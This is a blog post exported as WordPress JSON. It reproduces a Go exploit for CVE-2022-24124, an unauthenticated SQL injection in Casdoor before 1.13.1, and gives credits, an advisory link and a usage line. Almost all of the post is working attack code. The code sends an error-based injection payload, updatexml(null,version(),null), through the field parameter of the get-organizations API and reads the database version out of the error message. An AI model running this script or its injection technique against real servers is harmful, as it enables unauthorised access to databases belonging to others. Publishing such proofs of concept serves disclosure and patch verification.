\/\/ Exploit Title: Casdoor 1.13.0 SQL Injection (Unauthenticated)
\n\/\/ Date: 2022-02-25
\n\/\/ Exploit Author: Mayank Deshmukh
\n\/\/ Vendor Homepage: https:\/\/casdoor.org\/
\n\/\/ Software Link: https:\/\/github.com\/casdoor\/casdoor\/releases\/tag\/v1.13.0
\n\/\/ Version: version < 1.13.1
\n\/\/ Security Advisory: https:\/\/github.com\/advisories\/GHSA-m358-g4rp-533r
\n\/\/ Tested on: Kali Linux
\n\/\/ CVE : CVE-2022-24124
\n\/\/ Github POC: https:\/\/github.com\/ColdFusionX\/CVE-2022-24124<\/p>\n
\/\/ Exploit Usage : go run exploit.go -u http:\/\/127.0.0.1:8080<\/p>\n
package main<\/p>\n
import (
\n“flag”
\n“fmt”
\n“html”
\n“io\/ioutil”
\n“net\/http”
\n“os”
\n“regexp”
\n“strings”
\n)<\/p>\n
func main() {
\nvar url string
\nflag.StringVar(&url, “u”, “”, “Casdoor URL (ex. http:\/\/127.0.0.1:8080)”)
\nflag.Parse()<\/p>\n
banner := `
\n-=Casdoor SQL Injection (CVE-2022-24124)=-
\n– by Mayank Deshmukh (ColdFusionX)<\/p>\n
`
\nfmt.Printf(banner)
\nfmt.Println(“[*] Dumping Database Version”)
\nresponse, err := http.Get(url + “\/api\/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)”)<\/p>\n
if err != nil {
\npanic(err)
\n}<\/p>\n
defer response.Body.Close()<\/p>\n
databytes, err := ioutil.ReadAll(response.Body)<\/p>\n
if err != nil {
\npanic(err)
\n}<\/p>\n
content := string(databytes)<\/p>\n
re := regexp.MustCompile(“(?i)(XPATH syntax error.*')”)<\/p>\n
result := re.FindAllString(content, -1)<\/p>\n
sqliop := fmt.Sprint(result)
\nreplacer := strings.NewReplacer(“[“, “”, “]”, “”, “'”, “”, “;”, “”)<\/p>\n
finalop := replacer.Replace(sqliop)
\nfmt.Println(html.UnescapeString(finalop))<\/p>\n
if result == nil {
\nfmt.Printf(“Application not vulnerable\\n”)
\nos.Exit(1)
\n}<\/p>\n
}<\/p>\n","protected":false},"excerpt":{"rendered":"
\/\/ Exploit Title: Casdoor 1.13.0 SQL Injection (Unauthenticated) \/\/ Date: 2022-02-25 \/\/ Exploit Author: Mayank Deshmukh \/\/ Vendor Homepage: https:\/\/casdoor.org\/ \/\/ Software Link: https:\/\/github.com\/casdoor\/casdoor\/releases\/tag\/v1.13.0 \/\/ Version: version < 1.13.1 \/\/ Security Advisory: https:\/\/github.com\/advisories\/GHSA-m358-g4rp-533r \/\/ Tested on: Kali Linux \/\/ CVE : CVE-2022-24124 \/\/ Github POC: https:\/\/github.com\/ColdFusionX\/CVE-2022-24124 \/\/ Exploit Usage : go run exploit.go -u http:\/\/127.0.0.1:8080 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21124","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21124","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21124"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21124\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21124"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21124"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21124"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}